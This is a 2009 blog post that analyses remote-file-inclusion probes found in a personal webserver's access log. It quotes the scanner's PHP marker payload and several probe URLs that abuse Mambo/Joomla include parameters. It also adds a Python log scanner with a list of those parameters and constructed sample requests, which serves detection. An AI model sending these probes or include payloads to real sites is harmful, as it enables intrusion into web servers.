Somebody in Denmark thought something in ... / 2009-11-19

Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:
$ grep -c ~httpd/idefix/logs/access_log
All attempts try to include a remote file containing this bit of PHP source:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
which will display ShiroHige as one word when run through the PHP processor, so the scanner only has to look for that string in the response to know the include worked.

All URLs are attempts which assume some vulnerable script sits behind a visible part of the site, such as the root, my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0D
GET /~koos//?mosConfig_absolute_path=%0D
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0D
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0D
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0D
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0D
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0D
A bit of research finds that the next bit of code to execute would try to get info on the PHP setup (OS, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to, but that is all dynamic: only when the third script is loaded via the vulnerability are a number of variables set with the IP and port to connect to.
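To pick these probes out of an access log without reading it by hand, here is an added example in Python (not code from the original post). It parses Apache combined-format lines, flags query parameters that either carry a remote URL as value or use one of the include parameter names from the samples above (mosConfig_absolute_path, mosConfig_live_site, absolute_path, g_pcltar_lib_dir), and groups the hits per client. The log lines are constructed: the client addresses are TEST-NET ranges, the user agent and the example.com include URL are assumptions, only the request paths come from the samples above.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Query parameters the Mambo/Joomla include probes in the post pass a path
# through.  Taken from the sample URLs above; the set is not exhaustive.
RFI_PARAMS = {
    "mosConfig_absolute_path",
    "mosConfig_live_site",
    "absolute_path",
    "g_pcltar_lib_dir",
}

# Apache combined log format: client ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A value pointing at another host is the actual remote file inclusion,
# whatever the parameter is called.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def rfi_indicators(target):
    """Return [(param, value, reason)] for query parameters in one request
    target (path plus query string) that look like remote-include attempts."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            hits.append((name, value, "remote URL in value"))
        elif name in RFI_PARAMS:
            hits.append((name, value, "known include parameter"))
    return hits


def scan_access_log(lines):
    """Parse access-log lines and return (per_client, per_param):
    per_client maps client IP -> list of (target, indicators),
    per_param counts how often each parameter name was abused.
    Lines that do not parse are skipped rather than guessed at."""
    per_client = {}
    per_param = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = rfi_indicators(m.group("target"))
        if not hits:
            continue
        per_client.setdefault(m.group("ip"), []).append((m.group("target"), hits))
        for name, _, _ in hits:
            per_param[name] += 1
    return per_client, per_param


# Constructed sample log lines (TEST-NET addresses, assumed user agent,
# example.com as the include host): two probe forms from the post, one
# request carrying a real remote URL, one ordinary page fetch that must not
# be flagged, and one unparseable line.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Nov/2009:03:12:01 +0100] "GET //?mosConfig_absolute_path=%0D HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [19/Nov/2009:03:12:02 +0100] "GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20 HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [19/Nov/2009:03:12:03 +0100] "GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://example.com/id.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [19/Nov/2009:03:15:44 +0100] "GET /~koos/newsitem.cgi?id=123 HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


if __name__ == "__main__":
    clients, params = scan_access_log(SAMPLE_LOG)
    for ip, reqs in clients.items():
        print(f"{ip}: {len(reqs)} suspicious request(s)")
        for target, hits in reqs:
            for name, value, reason in hits:
                print(f"  {reason}: {name}={value!r} in {target}")
    print("parameters abused:", dict(params))
```

The whitespace-only values (%20, %0D) in the samples are the scanner's first stage, checking whether the parameter is reachable at all; the remote URL stage is what the echo/die marker above confirms. Matching on a remote URL in any parameter value catches the second stage even for component names not in the list, while the parameter-name list catches the first stage where there is no URL to match yet.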

Like any good bot, it also notifies its maker from a hidden-away part of its source, which would look like:

Subject: Fx29Shell by

Boss, there was an injected target on by
Searching for the term Fx29Shell gives a scary answer: "Results 1 - 10 of about 221,000 for Fx29Shell", with a lot of those results still showing webservers where this script is active.

But none of my home-made web stuff is in the habit of executing remote PHP scripts. And given the load of sites hosted there, it's probably a script running on that server which got hacked from a third place.
